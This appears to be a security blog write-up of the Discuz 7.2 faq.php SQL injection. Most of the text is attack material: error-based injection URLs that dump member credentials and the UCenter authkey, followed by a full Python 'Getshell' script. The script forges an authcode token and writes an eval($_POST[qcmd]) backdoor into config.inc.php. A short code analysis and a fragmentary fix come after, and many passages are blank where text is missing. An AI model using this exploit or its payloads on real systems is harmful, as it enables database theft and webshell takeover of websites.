Discuz /faq.php SQL Injection Vulnerability
1. 취약점 설명
1.
2. 。 cmd5.com , salt, salt "1"
: admin:c6c45f444cf6a41b309c9401ab9a55a7:066ff71
: c6c45f444cf6a41b309c9401ab9a55a7:066ff7
3. uc_key shell
4. , webshell
Relevant Link:
http://sebug.net/vuldb/ssvid-87115
http://sebug.net/vuldb/ssvid-87114
2. 취약점 트리거 조건
1.
http://localhost/discuz7.2/faq.php?action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)%23
2.
http://localhost/discuz7.2/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=) and (select 1 from (select count(*),concat((select (select (select concat(username,0x27,password) from cdb_members limit 1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23
3. key
http://localhost/discuz7.2/faq.php?action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat(floor(rand(0)*2),0x3a,(select substr(authkey,1,62) from cdb_uc_applications limit 0,1),0x3a)x from information_schema.tables group by x)a)%23
// error based injection
0x1: POC
import sys,urllib,time,math,base64,hashlib,urllib2
#contant raw
def fg(kaishi, jieshu, wenben):
    """Return the stripped text between the first *kaishi* and the next *jieshu* in *wenben*.

    Returns None when either marker is missing (the original falls off the end of the
    function in that case, which yields None as well).
    """
    head = wenben.find(kaishi)
    if head < 0:
        return None
    head += len(kaishi)
    tail = wenben.find(jieshu, head)
    if tail < 0:
        return None
    return wenben[head:tail].strip()
#microtime
def microtime(get_as_float=False):
    """Mimic PHP microtime(): a float timestamp, or the '<fraction> <seconds>' string form.

    The string form prints the fractional part with 8 decimals followed by the
    integer seconds, matching the value get_authcode() hashes into keyc.
    """
    now = time.time()
    if get_as_float:
        return now
    frac, whole = math.modf(now)
    return '%.8f %d' % (frac, whole)
#authget
def get_authcode(string, key = ''):
    """Port of the UCenter/Discuz PHP authcode() encrypt path.

    Derives an RC4-style keystream from md5 hashes of *key* plus a 4-character
    time-dependent value (keyc), XORs the framed *string* with it, and returns
    keyc followed by the base64 ciphertext with '=' padding stripped.

    Python 2 only: hashlib.md5() is fed str objects and range() is mutated as
    a list; both fail on Python 3.

    Args:
        string: plaintext to encode.
        key: shared secret; hashed before use, so any str is accepted.
    Returns:
        str token of the form keyc + base64(ciphertext) without '=' padding.
    """
    ckey_length = 4;
    # key material: md5 of the key, then each 16-char half hashed again
    key = hashlib.md5(key).hexdigest();
    keya = hashlib.md5(key[0:16]).hexdigest();
    keyb = hashlib.md5(key[16:32]).hexdigest();
    # keyc: last 4 hex chars of md5(microtime()), so every call yields a
    # different token; it is emitted in clear as the token prefix (the PHP
    # side presumably reads it back to rebuild cryptkey -- not verifiable here)
    keyc = (hashlib.md5(microtime()).hexdigest())[-ckey_length:];
    #keyc = (hashlib.md5('0.736000 1389448306').hexdigest())[-ckey_length:]
    cryptkey = keya + hashlib.md5(keya+keyc).hexdigest();
    key_length = len(cryptkey);
    # frame the plaintext: ten '0' characters (presumably the PHP authcode
    # expiry field, 0 = never -- TODO confirm), a 16-char md5(string+keyb)
    # prefix (presumably an integrity tag), then the plaintext itself
    string = '0000000000' + (hashlib.md5(string+keyb)).hexdigest()[0:16]+string;
    string_length = len(string);
    result = '';
    box = range(0, 256);  # mutable list under Python 2 only
    rndkey = dict();
    # repeat cryptkey's bytes cyclically over 256 positions
    for i in range(0,256):
        rndkey[i] = ord(cryptkey[i % key_length]);
    # key scheduling: RC4 KSA swap loop driven by rndkey
    j=0;
    for i in range(0,256):
        j = (j + box[i] + rndkey[i]) % 256;
        tmp = box[i];
        box[i] = box[j];
        box[j] = tmp;
    # keystream generation: RC4 PRGA, one byte XORed per plaintext character
    a=0;
    j=0;
    for i in range(0,string_length):
        a = (a + 1) % 256;
        j = (j + box[a]) % 256;
        tmp = box[a];
        box[a] = box[j];
        box[j] = tmp;
        result += chr(ord(string[i]) ^ (box[(box[a] + box[j]) % 256]));  # str += is quadratic in Py2; fine for short inputs
    # '=' padding is stripped; the receiving side must tolerate unpadded base64
    return keyc + base64.b64encode(result).replace('=', '');
#getshell
def get_shell(url0,key,host):
    """Send two authenticated ``updateapps`` requests to the target's api/uc.php.

    A request token is built with get_authcode() and *key* (the authkey
    recovered by the injection in the main script) and passed as the ``code``
    query parameter. The first POST body sets UC_API to a value containing
    PHP code; the second resets UC_API to a plain URL. Per the trailing
    comment on the return line, the value is presumably written into
    config.inc.php by the app-update handler -- not verifiable from this file.

    Args:
        url0: full URL of api/uc.php on the target.
        key: UCenter application authkey (uc_key).
        host: base URL; only echoed in the returned message.
    Returns:
        A status str. "error to read" / "error" are returned when the first /
        second request raises; the bare ``except`` swallows every exception
        (including KeyboardInterrupt), so the actual cause is never reported.
    Detection note: both requests are POSTs to /api/uc.php with a ``code``
    query parameter and an XML body containing ``<item id="UC_API">``.
    """
    headers={'Accept-Language':'zh-cn',
             'Content-Type':'application/x-www-form-urlencoded',
             'User-Agent':'Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)',
             'Referer':url0
             };
    # token timestamp 10 hours ahead of local time (presumably so the receiver's
    # freshness check passes despite clock differences -- TODO confirm)
    tm = time.time()+10*3600;
    tm="time=%d&action=updateapps" %tm;
    code = urllib.quote(get_authcode(tm,key));
    url0=url0+"?code="+code;
    # first body: UC_API value carries PHP; the \') closes the quoted PHP string
    # the value is presumably interpolated into
    data1='''<?xml version="1.0" encoding="ISO-8859-1"?>
<root>
<item id="UC_API">http://xxx\');eval($_POST[qcmd]);//</item>
</root>''';
    try:
        req=urllib2.Request(url0,data=data1,headers=headers);
        ret=urllib2.urlopen(req);  # response is neither checked nor closed
    except:
        return "error to read";
    # second body: restore UC_API to an ordinary URL value
    data2='''<?xml version="1.0" encoding="ISO-8859-1"?>
<root>
<item id="UC_API">http://aaa</item>
</root>''';
    try:
        req=urllib2.Request(url0,data=data2,headers=headers);
        ret=urllib2.urlopen(req);
    except:
        return "error";
    # "OK" only means both POSTs returned without raising, not that the write succeeded
    return "OK: "+host+"/config.inc.php | Password = qcmd"; # /config/uc_config.php config.inc.php by niubl
#define over
#url from users
# --- script entry point: usage check, authkey extraction via the faq.php
# injection, then get_shell() against api/uc.php. Python 2 only (print
# statement, raw_input, urllib.urlopen).
right = len(sys.argv);
if right < 2:
    #note
    print ("============================================================");
    print ("Discuz <= 7.2 Getshell");
    print ("Wrote by Airbasic");
    print ("Usage: py.exe " + sys.argv[0] + " http://localhost/dz");
    print ("============================================================");
    raw_input("");
    sys.exit()
url = sys.argv[1];  # base URL of the target, used without validation or trailing-slash handling
#go
# Two error-based injection URLs through gids[]; each leaks part of
# cdb_uc_applications.authkey (chars 1-31, then from char 32) via the
# count(*)/rand(0)/group by duplicate-key error.
url1 = url + "/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=) and (select 1 from (select count(*),concat(floor(rand(0)*2),0x3a,(select substr(authkey,1,31) from cdb_uc_applications where appid =1))x from information_schema .tables group by x)a)%23";
url2 = url + "/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=) and (select 1 from (select count(*),concat(floor(rand(0)*2),0x3a,(select substr(authkey,32,64) from cdb_uc_applications where appid =1))x from information_schema .tables group by x)a)%23";
#authkey1~31
wy1 = urllib.urlopen(url1);  # response object is never closed
nr1 = wy1.read();
# fg() returns the text between "'1:" and "' for" -- presumably the MySQL
# "Duplicate entry '1:<value>' for key" message echoed in the page (TODO confirm).
# It returns None when the markers are absent (error hidden, patched target),
# which makes the concatenation below raise TypeError instead of a clear message.
authkey1 = fg("'1:","' for",nr1);
#authkey32~64
wy2 = urllib.urlopen(url2);
nr2 = wy2.read();
authkey2 = fg("'1:","' for",nr2);
#authkey
authkey = authkey1+authkey2;
#get username and password
#none
#over
#get webshell
url0 = url + "/api/uc.php";
host = url;
# printed unconditionally before get_shell() runs, so it is not a success indicator
print ("Wrote by Airbasic , GetShell Ok !");
print get_shell(url0,authkey,host);
raw_input("");
Relevant Link:
http://blog.csdn.net/yiyefangzhou24/article/details/36913287
http://qqhack8.blog.163.com/blog/static/11414798520146711246279/
3. 취약점 영향 범위
4. 취약점 코드 분석
/faq.php
..
elseif($action == 'grouppermission')
{
..
// $groupids is built from $gids (which comes from $_GET[gids])
$groupids = array();
foreach($gids as $row)
{
// only the first element of each entry is collected into $groupids
$groupids[] = $row[0];
/*
Discuz applies addslashes to GET input, so "'" becomes "\'".
For example gids[1]=' gives $gids[1]=\', and $groupids[] = $row[0] keeps only the first character of that string, which is "\".
*/
}
/*
The SQL is assembled by implodeids from $groupids, which quotes each element and joins them with ',', e.g. '1','2','3','4'.
With the lone backslash the result becomes '1','\','3','4': the backslash escapes the quote that should close the second element,
so the quoting is broken and the third element is no longer inside a string literal.
*/
$query = $db->query("SELECT * FROM {$tablepre}usergroups u LEFT JOIN {$tablepre}admingroups a ON u.groupid=a.admingid WHERE u.groupid IN (".implodeids($groupids).")");
$groups = array();
..
Relevant Link:
http://simeon.blog.51cto.com/18680/1440000
5. 방어 방법
/faq.php
elseif($action == 'grouppermission')
{
/* $gids */
$gids = array();
/* */
Relevant Link:
http://www.crazydb.com/archive/Discuz7.xSQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E4%B8%8EEXP
http://simeon.blog.51cto.com/18680/1440000
6. 공방 사고
Copyright (c) 2015 LittleHann All rights reserved